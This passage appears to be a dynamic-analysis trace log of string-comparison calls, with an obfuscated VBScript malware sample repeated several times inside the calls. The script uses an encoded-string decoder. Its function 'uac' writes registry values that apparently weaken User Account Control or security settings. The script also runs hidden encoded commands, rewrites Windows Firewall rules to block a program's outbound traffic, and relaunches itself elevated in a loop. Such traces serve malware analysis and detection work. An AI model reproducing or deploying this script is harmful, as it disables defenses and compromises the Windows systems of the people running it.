bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0226.328] wcsncmp (_String1="W_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 74 [0226.328] wcsncmp (_String1="_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 82 [0226.328] wcsncmp (_String1="RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.328] wcsncmp (_String1="ULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run 